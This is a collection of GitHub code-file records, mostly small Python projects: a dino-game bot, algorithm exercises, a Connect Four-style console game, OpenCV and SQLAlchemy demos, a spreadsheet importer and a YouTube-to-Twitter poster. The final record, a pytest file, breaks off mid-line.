+{"seq_id":"29264936202","text":"from PIL import ImageGrab, ImageOps\nimport pyautogui\nimport time\nimport numpy as np\nimport os\n\n#os.system('chrome://dino/')\n\ndef jump():\n global run_time\n #waitDown = 0.200 - 1.05 ** run_time / 1000\n #if waitDown < 0.05:\n # waitDown = 0.05\n #print(waitDown, end=' ')\n\n pyautogui.keyUp('down')\n pyautogui.keyDown('space')\n while look() < basic:\n pass\n print('jump')\n #time.sleep(waitDown)\n time.sleep(0.006)\n pyautogui.keyUp('space')\n time.sleep(0.012)\n pyautogui.keyDown('down')\n pass\n\ndef look():\n global run_time\n x = 190 + run_time / 1.13 #5.2\n y = 410\n\n if x > 420:\n x = 420\n #x = 190 + 1.045 ** run_time\n\n image = ImageGrab.grab((x, y, x+150, y+10))\n image = ImageOps.grayscale(image)\n imageNp = np.array(image.getcolors())\n imageNpMean = imageNp.mean()\n print('run_time:%.2f place:%.2f value:%.2f' %(run_time, x, imageNpMean))\n #print(loop, imageNpMean)\n return imageNpMean\n\ndef lookDown():\n global run_time\n x = 140\n y = 410\n\n image = ImageGrab.grab((x, y, x+100, y+10))\n image = ImageOps.grayscale(image)\n imageNp = np.array(image.getcolors())\n imageNpMean = imageNp.mean()\n print('%.2f %.2f %.2f' %(run_time, x, imageNpMean))\n return imageNpMean\n\ninput('press any key...')\nprint('start')\nstart_time = time.time()\nrun_time = 0\nbasic = look()\nbasicDown = lookDown\n\npyautogui.moveTo(480, 370)\npyautogui.click()\nwhile True:\n run_time = time.time() - start_time\n if look() < basic :\n jump()","repo_name":"kev1nCh1u/dino_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13443617815","text":"# Step 1 import and Set turtle's 
shape, color\r\nimport turtle\r\nimport time\r\nturtle.shape(\"turtle\")\r\nturtle.color(\"red\")\r\n\r\n# Step 2 set turtle starting position\r\nturtle.penup()\r\nturtle.goto(0, -100)\r\nturtle.pendown()\r\nturtle.pensize(5)\r\n\r\n# Step 3 Draw a heart shape\r\nturtle.begin_fill()\r\nturtle.left(140)\r\nturtle.forward(224)\r\nturtle.circle(-112, 200)\r\nturtle.setheading(60)\r\nturtle.circle(-112, 200)\r\nturtle.forward(224)\r\nturtle.end_fill()\r\n\r\n# Step 4 Write I love you below heart shape\r\nturtle.penup()\r\nturtle.goto(-120, -180)\r\nturtle.pendown()\r\nturtle.write(\"I love you!\", font=(\"Arial\", 36, \"normal\"))\r\n\r\n# Step 5 set turtle Background fancy colors\r\nt = turtle.Turtle()\r\ncolors = [\"purple\",\"pink\", \"maroon\", \"magenta\", \"light slate blue\", \"violet\", \"black\"]\r\n\r\nfor color in colors:\r\n t.screen.bgcolor(color)\r\n time.sleep(1)\r\n\r\n# step 6 Keep the window open until the user closes it\r\nturtle.done()","repo_name":"abhisheksingh7481/python","sub_path":"love1.py","file_name":"love1.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"15981393477","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nfrom collections import deque\n\n\n#\n# Complete the 'equalStacks' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER_ARRAY h1\n# 2. INTEGER_ARRAY h2\n# 3. INTEGER_ARRAY h3\n#\n\n\ndef equalStacks(h1, h2, h3):\n \"\"\"\n solve using the object deque from the collection module\n \"\"\"\n s1 = sum(h1)\n s2 = sum(h2)\n s3 = sum(h3)\n\n d1 = deque(h1)\n d2 = deque(h2)\n d3 = deque(h3)\n\n while d1 and d2 and d3:\n if s1 == s2 == s3:\n return s1\n elif s1 > s2:\n s1 -= d1.popleft()\n elif s3 > s2:\n s3 -= d3.popleft()\n else:\n s2 -= d2.popleft()\n\n return 0\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n first_multiple_input = input().rstrip().split()\n\n n1 = int(first_multiple_input[0])\n\n n2 = int(first_multiple_input[1])\n\n n3 = int(first_multiple_input[2])\n\n h1 = list(map(int, input().rstrip().split()))\n\n h2 = list(map(int, input().rstrip().split()))\n\n h3 = list(map(int, input().rstrip().split()))\n\n result = equalStacks(h1, h2, h3)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"INSAlgo/trainings-2020","sub_path":"W04_data_structures/equal_stacks.py","file_name":"equal_stacks.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"21653737217","text":"# Source code in python3\ndef distance(x1, y1, x2, y2):\n return ((x2 - x1)**2 + (y2 - y1)**2)**(0.5);\n\nnumberOfPoints = int(input());\npoints = [];\n\nfor i in range(numberOfPoints):\n point = list(map(int, input().split()));\n points.append(point);\n\ndef sortX(point):\n return point[0];\n\ndef sortY(point):\n return point[1];\n\npoints.sort(key = sortX);\n\ndef minDistanceInStrip(initialSetPoints, d):\n filteredPoints = [point for point in initialSetPoints if point[0] < d];\n minimumDistance = d;\n numberOfFilteredPoints = len(filteredPoints);\n for i in range(len(filteredPoints)):\n for j in range(i+1, len(filteredPoints)):\n dist = distance(filteredPoints[i][0], filteredPoints[i][1], filteredPoints[j][0], filteredPoints[j][1]);\n if dist < minimumDistance:\n minimumDistance = dist\n return minimumDistance;\n\ndef 
minDistNaive(pointsList):\n minimumDistance = 99999999999;\n for i in range(len(pointsList)):\n for j in range(i+1, len(pointsList)):\n dist = distance(pointsList[i][0], pointsList[i][1], pointsList[j][0], pointsList[j][1]);\n if dist < minimumDistance:\n minimumDistance = dist;\n return minimumDistance;\n\ndef minDistance(pointsList):\n middlePointIndex = int(len(pointsList) / 2);\n set1 = pointsList[0: middlePointIndex];\n set2 = pointsList[middlePointIndex:];\n if(len(set1) <= 2 or len(set2) <= 2):\n return minDistanceInStrip(pointsList, minDistNaive(pointsList));\n d1 = minDistance(set1);\n d2 = minDistance(set2);\n return minDistanceInStrip(pointsList, min(d1, d2));\n\nprint(minDistance(points));\n","repo_name":"chnaveen138/Coursera-Data-Strucures-and-Algorithms-Specialization","sub_path":"Algorithmic Toolbox/4. Divide and Conquer/closest_points.py","file_name":"closest_points.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"36266032499","text":"# Keoni Akina\n# 98point6_drop_token.py\n# This is a ConnectFour command line implementation\n# Simply run the Python Script\n# The game responds to the commands that were listed in the instructions and below\n\n#PUT -> (OK | ERROR | WIN | DRAW)\n#GET -> List of columns that have been successfully put to\n#BOARD -> a 4x4 matrix that shows the board state\n#EXIT -> Ends the Program\n\nfrom sys import stdin\nimport numpy\n\n# Command List\nGET = \"GET\"\nBOARD = \"BOARD\"\nEXIT = \"EXIT\"\n\n# Globals\nconst_game_size = 4\nturns_remaining = const_game_size ** 2\ngame_board = numpy.zeros((const_game_size,const_game_size), dtype=int)\nplayer_turn = 1\nput_stack = []\n\n\ndef print_game_board():\n\n row_string = \"| \"\n dash_string = \"+ \"\n num_string = \" \"\n\n for row in range(0, const_game_size):\n for col in range(0, const_game_size):\n row_string += str(int(game_board[row, col])) + \" \"\n print(row_string)\n row_string = \"| \"\n\n for i in range(0, const_game_size):\n dash_string += \"- \"\n print(dash_string)\n\n for i in range(1, const_game_size + 1):\n num_string += str(i) + \" \"\n print(num_string)\n\n\ndef inspect_for_put_command(command):\n\n for put_col_index in range(1, const_game_size + 1):\n if command == \"PUT \" + str(put_col_index):\n return check_and_execute_put(put_col_index)\n return False\n\n\ndef check_and_execute_put(put_col_index):\n\n if put_col_index <= 0 or put_col_index > const_game_size:\n print(\"Error: Out of Bounds\")\n return False\n elif game_board[0, put_col_index - 1] != 0:\n print(\"Error: Column Full\")\n return False\n else:\n insert_put_value(put_col_index)\n return True\n\n\ndef insert_put_value(put_col_index):\n\n global turns_remaining\n\n for row in range(const_game_size - 1, -1, -1):\n if game_board[row, put_col_index - 1] == 0:\n game_board[row, put_col_index - 1] = get_player_turn()\n turns_remaining -= 1\n set_player_turn()\n add_to_put_stack(put_col_index)\n print(\"OK\")\n return\n print(\"ERROR: Full Column\")\n return\n\n\ndef get_player_turn():\n\n return player_turn\n\n\ndef set_player_turn():\n\n global player_turn\n\n if player_turn == 1:\n player_turn = 2\n else:\n player_turn = 1\n\n\ndef check_for_winner():\n\n if lr_diagonal_down_win():\n return True\n elif lr_diagonal_up_win():\n return True\n elif check_row_win():\n return True\n elif check_col_win():\n return True\n else:\n return False\n\n\ndef lr_diagonal_down_win():\n\n # Check for left to right diagonal win\n for row in 
range(0, const_game_size):\n col = row\n if game_board[row, col] == 0:\n return False\n\n elif game_board[row, col] != game_board[row + 1, col + 1]:\n return False\n elif row == const_game_size - 2:\n # We've reached the end of the diagonal successfully\n return get_player_turn()\n\n\ndef lr_diagonal_up_win():\n\n for row in range(const_game_size - 1, 0, -1):\n col = (const_game_size - 1) - row\n if game_board[row, col] == 0:\n return False\n elif game_board[row, col] != game_board[row - 1, col + 1]:\n return False\n elif col == const_game_size - 2:\n # We've reached the end of the diagonal successfully\n return get_player_turn()\n\n\ndef check_row_win():\n\n for row in range(0, const_game_size):\n for col in range(0, const_game_size):\n if game_board[row, col] == 0:\n break\n elif game_board[row, col] != game_board[row, col + 1]:\n break\n elif col == const_game_size - 2:\n # We've reached the end of the row successfully\n return get_player_turn()\n return False\n\n\ndef check_col_win():\n\n for col in range(0, const_game_size):\n for row in range(0, const_game_size):\n if game_board[row, col] == 0:\n break\n elif game_board[row, col] != game_board[row + 1, col]:\n break\n elif row == const_game_size - 2:\n # We've reached the end of the col successfully\n return get_player_turn()\n return False\n\n\ndef add_to_put_stack(put_num):\n\n global put_stack\n\n put_stack.append(put_num)\n\n\ndef print_put_stack():\n\n global put_stack\n\n for i in range(0, len(put_stack)):\n print(put_stack[i])\n\n\n# TESTING FUNCTIONS\n\ndef reset_game():\n\n global game_board\n global turns_remaining\n global put_stack\n\n turns_remaining = const_game_size ** 2\n game_board = numpy.zeros((const_game_size, const_game_size), dtype=int)\n put_stack = []\n\n\ndef play_again():\n\n yes = 'Y'\n no = 'N'\n\n print(\"Play again? 
Y/N\")\n ans = stdin.readline().rstrip('\\n')\n while ans != yes and ans != no:\n ans = stdin.readline().rstrip('\\n')\n if ans == yes:\n reset_game()\n command = stdin.readline().rstrip('\\n')\n else:\n command = EXIT\n\n return command\n\n# TESTING FUNCTIONS\n\n\ndef main():\n\n print(\"Welcome to Drop Token!\")\n print(\"Press any key to start...\")\n stdin.readline().rstrip('\\n')\n print(\"Player \" + str(get_player_turn()) + \" > \")\n command = stdin.readline().rstrip('\\n')\n win = False\n draw = False\n\n while command != EXIT:\n valid_move = inspect_for_put_command(command)\n print(\"Player \" + str(get_player_turn()) + \" > \")\n if turns_remaining == 0 and not draw:\n draw = True\n print(\"DRAW\")\n elif valid_move:\n if check_for_winner() and not win:\n win = True\n print(\"WIN\")\n elif command == BOARD:\n print_game_board()\n elif command == GET:\n print_put_stack()\n else:\n print(\"Error: Unknown command\")\n command = stdin.readline().rstrip('\\n')\n\n if command == EXIT:\n print(\"DONE.\")\n else:\n \"DRAW.\"\n\nmain()\n\n\n\n\n\n","repo_name":"kcakina/98point6","sub_path":"98point6_drop_token.py","file_name":"98point6_drop_token.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18308821748","text":"from datetime import datetime\nfrom elasticsearch import Elasticsearch\n\nclass GeneralLogger:\n def __init__(self, es_host):\n self._es = Elasticsearch([{'host': es_host.split(':')[0], 'port':int(es_host.split(':')[1]), 'scheme':'http'}])\n\n def log(self, role_type, text):\n doc = {\n 'role': role_type,\n 'text': text,\n 'timestamp': datetime.now(),\n }\n self._es.index(index=\"aiot-index\", document=doc)\n self._es.indices.refresh(index=\"aiot-index\")","repo_name":"jpjayprasad-dev/aiotchat","sub_path":"controllers/general_logger.py","file_name":"general_logger.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1385862281","text":"import sys, os, copy\nsys.path.append(os.getcwd())\n\nfrom openpyxl import load_workbook\nimport datetime, time\nimport pandas\nimport uuid\n\nfrom config import Common\nfrom my_sqlite3 import Db\n\n\nclass OpenFile():\n\n def __init__(self) -> None:\n # self.my_class = my_class\n self.database = self.config.DATABASE\n self.must_database = self.config.MUST_DATABASE\n # 具有外键属性的列名,主要是连表查询\n self.foreign = Common.FOREIGN_KEY\n self.foreign_key = self.foreign.keys()\n self.foreign_value = self.foreign.values()\n # self.config_types = Common.FOREIGN_KEY.keys()\n self.id_name = self.database[0]\n self.empty = ['', 'null', 'None', None]\n self.db = Db('account.db')\n\n def open_file(self, filename=False):\n filename = filename if filename else self.filename\n\n # 读取 excel 表\n workbook = load_workbook(filename=filename)\n wb = workbook.active\n # 获取整张表数据\n table = [[cell.value for cell in row] for row in wb.rows]\n # 表标题 和 表内容\n table_values, table_cloumn = table[1:], table[0]\n # 复制一份没有被转换id的表\n import_fail = copy.deepcopy(table_values)\n # 待删除列表\n del_rows = []\n # 获取配置列表\n configs = self.__conifg()\n # 格式化时间标识\n is_date, is_date_created = True, True\n try:\n date_index = table_cloumn.index('date')\n except KeyError:\n is_date = False\n try:\n date_created_index = table_cloumn.index('date_created')\n except KeyError:\n is_date_created = False\n \n for index, row in enumerate(table_values):\n # 获取所有需要转换为id的配置类型\n for config_type in 
self.foreign_key:\n # 获取配置所在列表下标位置\n row_index = table_cloumn.index(config_type)\n # 将配置名称替换为配置id\n for i, mapping in enumerate(configs[config_type]):\n if mapping[1] == row[row_index]:\n row[row_index] = mapping[0]\n break\n # 将没有的配置id的行数加入到待删除列表中\n if mapping[1] != row[row_index] and index not in del_rows and (i+1) == len(configs[config_type]):\n del_rows.append(index)\n \n # 将必填项的空内容添加到待删除列表中\n for cloumn in self.must_database:\n row_index = table_cloumn.index(cloumn)\n if row[row_index] in self.empty:\n del_rows.append(index)\n continue\n\n # 将发生日期和创建日期转换为日期字符串\n if is_date:\n try:\n row[date_index] = row[date_index].strftime('%Y-%m-%d')\n except ValueError as e:\n print(e)\n except AttributeError:\n try:\n datetime.datetime.strptime(row[date_index], '%Y-%m-%d')\n except ValueError:\n del_rows.append(index)\n except TypeError:\n del_rows.append(index)\n \n if is_date_created:\n try:\n row[date_created_index] = row[date_created_index].strftime('%Y-%m-%d %H:%M:%S')\n except ValueError as e:\n print(e)\n except AttributeError as e:\n try:\n datetime.datetime.strptime(row[date_created_index], '%Y-%m-%d %H:%M:%S')\n except ValueError:\n row[date_created_index] = time.strftime('%Y-%m-%d %H:%M:%S')\n\n id_index = table_cloumn.index(self.id_name)\n if row[id_index] in self.empty:\n row[id_index] = str(uuid.uuid4())\n else:\n if self.find(id=row[row_index]): del_rows.append(index)\n\n # 去重\n del_rows = list(set(del_rows))\n # 删除部分行数,内容不和规定的\n table = [row for index, row in enumerate(table_values) if index not in del_rows]\n\n # 进行导入\n self.__upload(table_cloumn, table)\n # 打印导入失败的表单\n self.__print_fail_table(import_fail, table_cloumn, del_rows)\n\n\n def __conifg(self):\n from main.config import Config\n import pandas\n # 获取配置表\n config = Config().find()\n config = pandas.DataFrame(config)\n # 将配置表转变为字典 key 为配置类型 如 books\n\n def __config_value(config_key):\n # 将相同类型的列表结合在一起\n return [config.loc[index].values[0:2] for index in config.index if config.loc[index].values[2] == config_key]\n\n configs = {config.loc[index].values[2]: __config_value(config.loc[index].values[2]) for index in config.index}\n\n return configs\n \n def __upload(self, cloumns, values):\n\n cloumns = ', '.join(cloumns)\n\n values = '),('.join([str(row)[1:-1] for row in values])\n values = values.replace(\"'null',\", 'null,').replace(\", 'null'\", ', null') \n values = values.replace(\"None\", 'null') \n sql = f\"INSERT INTO {self.table} ({cloumns}) VALUES ({values});\"\n print(sql)\n self.db.other(sql)\n\n def __print_fail_table(self, import_fail, table_cloumn, del_rows):\n\n # 打印和展示导入失败的表\n if del_rows:\n is_import = input(\"存在导入失败的行数,是否进行导出? 
y/N: \")\n import_fail_table = [t for i, t in enumerate(import_fail) if i in del_rows]\n import_fail_table = pandas.DataFrame(import_fail_table, columns=table_cloumn)\n if is_import.upper() == 'Y':\n try:\n import_fail_table.to_excel(f'fial_账单表.xlsx', index=False)\n print(f\"导出成功 \\n {import_fail_table}\")\n except Exception:\n print(\"导出失败\")","repo_name":"xiongJum/lain-account","sub_path":"export_Import/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":6208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"26615006446","text":"# from google.protobuf import text_format\n# from object_detection.protos import pipeline_pb\nimport os\nimport subprocess\nfrom .Utility import *\n\nclass InstallDetectionTF:\n @staticmethod\n def install(ob_install_path,protoc_filename = \"\"):\n models_path = os.path.join(ob_install_path, 'models')\n research_path = os.path.join(models_path, 'research')\n slim_path = os.path.join(research_path, 'slim')\n\n os.chdir(ob_install_path)\n subprocess.call(['git', 'clone', '--quiet', 'https://github.com/tensorflow/models.git'])\n os.chdir(models_path)\n if Utility.isLinux():\n subprocess.call(['apt-get', 'install', '-qq', 'protobuf-compiler', 'python-tk'])\n elif Utility.isWindows():\n print(\"please specify the file path.\")\n return\n\n\n subprocess.call(['pip', 'install', '-q', 'Cython', 'contextlib2', 'pillow', 'lxml', 'matplotlib', 'PyDrive'])\n subprocess.call(['pip', 'install', '-q', 'pycocotools'])\n os.chdir(research_path)\n # subprocess.call(['cd', '~/models/research'])\n if Utility.isLinux():\n subprocess.call(['protoc', 'object_detection/protos/*.proto', '--python_out', '.'])\n elif Utility.isWindows():\n subprocess.call([protoc_filename,'object_detection/protos/*.proto', '--python_out', '.'])\n\n subprocess.call(['pip', 'install', 'pascal_voc_writer'])\n subprocess.call(['pip', 'install', 'imgaug'])\n subprocess.call(['pip', 'install', 'selenium'])\n subprocess.call(['pip', 'install', 'tf-models-official'])\n\n subprocess.call(['pip', 'install', 'tf_slim'])\n\n os.environ['PYTHONPATH'] += research_path\n os.environ['PYTHONPATH'] += slim_path\n\n\n subprocess.call(['python', os.path.join(research_path, 'object_detection/builders/model_builder_test.py')])\n\n os.chdir(research_path)\n # subprocess.call(['cd', '/root/models/research'])\n subprocess.call(['python', 'setup.py', 'build'])\n if Utility.isLinux():\n subprocess.call(['sudo', 'python', 'setup.py', 'install'])\n elif Utility.isWindows():\n subprocess.call(['runas', '/user:Administrator', 'python', 'setup.py', 'install'])\n\n","repo_name":"mostafaSataki/HKC","sub_path":"InstallDetectionTF.py","file_name":"InstallDetectionTF.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34665116658","text":"import matplotlib.pyplot as plt\nfrom dev import simple_tworoom_test\nfrom dev import simple_oneroom\n\n\nitr_room = simple_tworoom_test.Simple_Tworoom(iterations=10)\nitr_room.main()\ntworoom_solution = itr_room.get_solution()\n#itr_room.visualize()\n\n\nsimple_room = simple_oneroom.simple_oneroom()\nsimple_room.main()\noneroom_solution = simple_room.get_solution()\n#simple_room.visualize()\n\ndifference = oneroom_solution - tworoom_solution\n\n#plt.pcolor(difference)\n#plt.colorbar()\n#plt.show()\n\n# fig1 = plt.figure()\n# ax1 = fig1.add_subplot(111)\n# plt.title(\"Iterated solution\")\n# plt.pcolor(tworoom_solution)\n# 
plt.colorbar()\n#\n#\n# fig2 = plt.figure()\n# ax2 = fig2.add_subplot(111)\n# plt.title(\"Simple Solution\")\n# plt.pcolor(oneroom_solution)\n# plt.colorbar()\n#\n# plt.show()\n\n\n\nplt.subplot(221)\nplt.title(\"Iterated solution\")\nplt.figtext(0,0,\"Solution after 10 iterations, relaxation factor 0.8\")\nplt.pcolor(tworoom_solution)\nplt.colorbar()\nplt.subplot(222)\nplt.title(\"Simple Solution\")\nplt.pcolor(oneroom_solution)\nplt.colorbar()\n\nplt.subplot(223)\nplt.title(\"Difference\")\nplt.pcolor(difference)\nplt.colorbar()\nplt.show()\n\n\n\n","repo_name":"filipthor/Exjobb","sub_path":"exjobb/week_one/day_one/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"28401623818","text":"from bs4 import BeautifulSoup\nimport requests\nimport twitter\nimport datetime\n\nbase = 'https://www.youtube.com/user/Northernlion/videos?view=57&flow=grid'\nr = requests.get(base)\npage = r.text\nsoup = BeautifulSoup(page, 'html.parser')\n\nvideos = soup.find('h3', attrs={'class': 'yt-lockup-title'})\n\nwatch_title = videos.contents[0]['title']\nwatch_link = videos.contents[0]['href']\n\ntweet_text = watch_title + ': https://www.youtube.com' + watch_link + ' via @Youtube'\n\nwith open('data//logs.txt', 'r') as f:\n most_recent_attempt = f.readlines()[-1]\n\nwith open('data//previous_tweet.txt', 'w+') as f:\n if f != tweet_text:\n new_tweet = True\n f.seek(0)\n f.truncate()\n f.write(tweet_text)\n else:\n new_tweet = False\n with open('data//logs.txt', 'a') as fh:\n fh.write('\\nYour most recent YT video has not updated since the last check')\n fh.write(datetime.datetime.strftime(datetime.datetime.now(), ', %c'))\n\nwith open('twitter_keys.txt') as f:\n twitter_keys = []\n for line in f:\n twitter_keys.append(line.rstrip())\napi = twitter.Api(consumer_key=twitter_keys[0],\n consumer_secret=twitter_keys[1],\n access_token_key=twitter_keys[2],\n access_token_secret=twitter_keys[3])\n\ntry:\n status = api.PostUpdate(tweet_text, )\n with open('data//logs.txt', 'a') as f:\n f.write('\\nThe following message was tweeted : ' + tweet_text)\n f.write(datetime.datetime.strftime(datetime.datetime.now(), ', %c'))\nexcept UnicodeDecodeError:\n with open('data//logs.txt', 'a') as f:\n f.write('\\nYour message could not be encoded. Perhaps it contains non-ASCII characters?')\n f.write(datetime.datetime.strftime(datetime.datetime.now(), ', %c'))\nexcept twitter.error.TwitterError:\n with open('data//logs.txt', 'a') as f:\n f.write('\\nYour tweet was too long to be tweeted. 
Long title?')\n f.write(datetime.datetime.strftime(datetime.datetime.now(), ', %c'))\n","repo_name":"DDiggs91/YoutubeChannelTweeter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"21275727660","text":"# Ref: https://stackoverflow.com/questions/44588279/find-and-draw-the-largest-contour-in-opencv-on-a-specific-color-python\n\nimport numpy as np\nimport cv2\nfrom math import atan2, cos, sin, sqrt, pi\n\ndef drawAxis(img, p_, q_, color, scale):\n p = list(p_)\n q = list(q_)\n\n ## [visualization1]\n angle = atan2(p[1] - q[1], p[0] - q[0]) # angle in radians\n hypotenuse = sqrt((p[1] - q[1]) * (p[1] - q[1]) + (p[0] - q[0]) * (p[0] - q[0]))\n\n # Here we lengthen the arrow by a factor of scale\n q[0] = p[0] - scale * hypotenuse * cos(angle)\n q[1] = p[1] - scale * hypotenuse * sin(angle)\n cv2.line(img, (int(p[0]), int(p[1])), (int(q[0]), int(q[1])), color, 3, cv2.LINE_AA)\n\n # create the arrow hooks\n p[0] = q[0] + 9 * cos(angle + pi / 4)\n p[1] = q[1] + 9 * sin(angle + pi / 4)\n cv2.line(img, (int(p[0]), int(p[1])), (int(q[0]), int(q[1])), color, 3, cv2.LINE_AA)\n\n p[0] = q[0] + 9 * cos(angle - pi / 4)\n p[1] = q[1] + 9 * sin(angle - pi / 4)\n cv2.line(img, (int(p[0]), int(p[1])), (int(q[0]), int(q[1])), color, 3, cv2.LINE_AA)\n ## [visualization1]\n\ndef getOrientation(pts, img):\n print(\"dddddddddddddddddddddd\")\n ## [pca]\n # Construct a buffer used by the pca analysis\n sz = len(pts)\n data_pts = np.empty((sz, 2), dtype=np.float64)\n for i in range(data_pts.shape[0]):\n data_pts[i, 0] = pts[i, 0, 0]\n data_pts[i, 1] = pts[i, 0, 1]\n\n # Perform PCA analysis\n mean = np.empty((0))\n mean, eigenvectors, eigenvalues = cv2.PCACompute2(data_pts, mean)\n\n # Store the center of the object\n cntr = (int(mean[0, 0]), int(mean[0, 1]))\n\n ## [pca]\n\n ## [visualization]\n # Draw the principal components\n cv2.circle(img, cntr, 3, (255, 0, 255), 2)\n p1 = (\n cntr[0] + 0.02 * eigenvectors[0, 0] * eigenvalues[0, 0],\n cntr[1] + 0.02 * eigenvectors[0, 1] * eigenvalues[0, 0])\n p2 = (\n cntr[0] - 0.02 * eigenvectors[1, 0] * eigenvalues[1, 0],\n cntr[1] - 0.02 * eigenvectors[1, 1] * eigenvalues[1, 0])\n\n drawAxis(img, cntr, p1, (0, 153, 0), 1)\n drawAxis(img, cntr, p2, (0, 153, 0), 5)\n\n angle = atan2(eigenvectors[0, 1], eigenvectors[0, 0]) # orientation in radians\n print(\"angle::::\", angle)\n\n ## [visualization]p\n print(\"degree : \", np.rad2deg(angle))\n\n # Label with the rotation angle\n label = \" Ro \" + str(-int(np.rad2deg(angle)) - 90) + \" de\"\n print(\"After calculate angle\",str(-int(np.rad2deg(angle)) - 90))\n # textbox = cv.rectangle(img, (cntr[0], cntr[1] - 25), (cntr[0] + 250, cntr[1] + 10), (255, 255, 255), -1)\n # cv.putText(img, label, (cntr[0], cntr[1]), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1, cv.LINE_AA)\n\n return angle\n\n\n# load the image\nimage = cv2.imread(\"/home/mahdiislam/Mahdi/Biba/others_repo/Object-Detection-API/real_time.jpg\", 1)\n# (hMin = 0 , sMin = 70, vMin = 69- 56), (hMax = 22 , sMax = 251, vMax = 152)\n#\nscale_percent = 60 # percent of original size\nwidth = int(image.shape[1] * scale_percent / 100)\nheight = int(image.shape[0] * scale_percent / 100)\ndim = (width, height)\nresized = cv2.resize(image, dim, interpolation = cv2.INTER_AREA)\nimage = resized\nlower_hsv = [0,70,56]\nupper_hsv = [22,251,152]\nhsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\nmask = cv2.inRange(hsv,(0, 70, 56), (22, 251, 152) 
)\n\n\n\n# red color boundaries [B, G, R]\n# lower = [1, 0, 20]\n# upper = [60, 40, 220]\n#\n# # create NumPy arrays from the boundaries\n# lower = np.array(lower, dtype=\"uint8\")\n# upper = np.array(upper, dtype=\"uint8\")\n#\n# # find the colors within the specified boundaries and apply\n# # the mask\n# mask = cv2.inRange(image, lower, upper)\noutput = cv2.bitwise_and(image, image, mask=mask)\n\nret,thresh = cv2.threshold(mask, 40, 255, 0)\n\ncontours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n\n\nif len(contours) != 0:\n # draw in blue the contours that were founded\n\n # find the biggest countour (c) by the area\n c = max(contours, key = cv2.contourArea)\n print(c)\n cv2.drawContours(output, c, -1, 255, 3)\n\n getOrientation(c, image)\n\n x,y,w,h = cv2.boundingRect(c)\n\n # draw the biggest contour (c) in green\n # cv2.rectangle(output,(x,y),(x+w,y+h),(0,255,0),2)\n\n# show the images\ncv2.imshow(\"Result\", np.hstack([image, output]))\n\ncv2.waitKey(0)\n\n\n","repo_name":"mahdise/thesis_","sub_path":"Development/PriviuosExperimnets/segmentation-and-contours/specified_color_with_hsv.py","file_name":"specified_color_with_hsv.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31575186213","text":"from sqlalchemy import Column, String, create_engine, Integer, MetaData, Table\nfrom sqlalchemy.orm import sessionmaker, relationship, mapper\nfrom sqlalchemy.ext.declarative import declarative_base\n\n# 创建实例,并连接test库\nengine = create_engine('mysql+pymysql://root:zxs199325@localhost:3306/test')\n\n#元数据\nmetadata = MetaData()\n\nCustomer = Table('Customer', metadata,\n Column('cust', Integer, primary_key = True),\n Column('name', String(20)),\n Column('account', String(18))\n )\n\nclass User(object):\n def __init__(self):\n self.cust = cust\n self.name = name\n self.account = account\n\n def __repr__(self):\n output = \"(%s,%s,%s)\" %(self.cust,self.name,self.account)\n return output\n\nmapper(User, Customer)\n\nsession_class = sessionmaker(bind=engine)\nsession = session_class()\ninfo1 = session.query(User).filter(User.cust == 1).one() # filter相等用‘==’\ninfo2 = session.query(User).filter_by(cust = 2).one() # filter_by相等用‘=’\ninfo3 = session.query(User).filter(User.cust > 5).all()\nprint(info1,info2,info3)\n\n#多条件查询:\nobj = session.query(User).filter(User.cust > 2).filter(User.cust < 5).all()\nprint(obj)\n","repo_name":"Degelzhao/python","sub_path":"SQL/use_SQLAIchemy2.py","file_name":"use_SQLAIchemy2.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70483397597","text":"from ..exceptions import ForsetiSyntaxError\nfrom .syntax import check_syntax\n\nimport pytest\n\n\n@pytest.mark.parametrize(\n\t\"condition\",\n\t[\n\t\t\"AND SomeCommand\",\n\t\t\"SomeCommand AND\",\n\t\t\"OR SomeCommand\",\n\t\t\"SomeCommand OR\",\n\t\t\"И SomeCommand\",\n\t\t\"SomeCommand И\",\n\t\t\"ИЛИ SomeCommand\",\n\t\t\"SomeCommand ИЛИ\",\n\t\t\"NOT SomeCommand\",\n\t\t\"SomeCommand NOT\",\n\t]\n)\ndef test_check_syntax_errors(condition):\n\twith 